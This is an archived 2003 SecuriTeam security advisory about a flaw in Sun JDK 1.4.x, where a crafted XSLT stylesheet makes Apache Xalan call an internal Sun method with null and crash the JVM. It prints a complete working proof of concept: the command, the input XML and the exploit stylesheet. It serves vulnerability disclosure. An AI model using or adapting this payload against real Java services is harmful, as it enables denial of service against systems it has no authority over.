[NEWS] Denial of Service and JVM Crash via User Injectable XSL Template (toStdout)

From: SecuriTeam (support_at_securiteam.com)
Date: 09/21/03

  • Next message: SecuriTeam: "[NEWS] Denial of Service Vulnerability in DB2 Discovery Service"
    To: list@securiteam.com
    Date: 21 Sep 2003 13:46:50 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Denial of Service and JVM Crash via User Injectable XSL Template
    (toStdout)
    ------------------------------------------------------------------------

    SUMMARY

    A vulnerability in Sun's JVM allows local attackers to crash the Apache
    XALAN by causing it to parse malformed XML/XSLT data.

    DETAILS

    Vulnerable systems:
     * JDK version 1.4.1
     * JDK version 1.4.2

    Exploit:
    Command:
    c:\java\1.4.2\00\jre\bin\java org.apache.xalan.xslt.Process -IN a.xml -xsl
    sunexploit.xsl

     ===================a.xml===========================
    (a/)
     ===================a.xml===========================

     ===========sunexploit.xsl=============================
    (!-- XSLT JDK-Exploit by Marc Schoenefeld , marc@at@illegalaccess.org --)
    (xsl:stylesheet version="1.0"
       xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
                   xmlns:sun="sun")
                   (xsl:template match="/")
                   (xsl:variable name="tmp"
    select="sun:misc.MessageUtils.toStdout(null)"/)
                   (xsl:variable name="tmp2"
    select="sun:misc.MessageUtils.toStdout($tmp)"/)
                   (xsl:value-of select="$tmp2" /)
                   (/xsl:template)
    (/xsl:stylesheet)
     ===========sunexploit.xsl=============================

    ADDITIONAL INFORMATION

    The original advisory can be found at: <http://www.illegalaccess.org/>
    http://www.illegalaccess.org/.

    The information has been provided by <mailto:marc@beauchamp.de> Marc
    Schoenefeld.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[NEWS] Denial of Service Vulnerability in DB2 Discovery Service"

    Relevant Pages

    • [EXPL] Apple Core Foundation Library "CF_CHARSET_PATH" Local Root Exploit
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [NT] Microsoft Excel Length Parameter Parsing Buffer Overflow Vulnerability
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... * Microsoft Office XP Software (Excel 2002) ... * Microsoft Office v. X for Mac ...
      (Securiteam)
    • [NT] ZipGenius Directory Traversal
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... ZipGenius does not check before it unpacks a file, ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [NT] AOL Nullsoft Winamp IT Module Heap Memory Corruption (IN_MOD.DLL)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... run arbitrary code in context of user running AOL Nullsoft Winamp. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [NT] Symantec AntiVirus Engine CAB Parsing Heap Overflow Vulnerability
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Symantec AntiVirus Engine CAB Parsing Heap Overflow Vulnerability ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)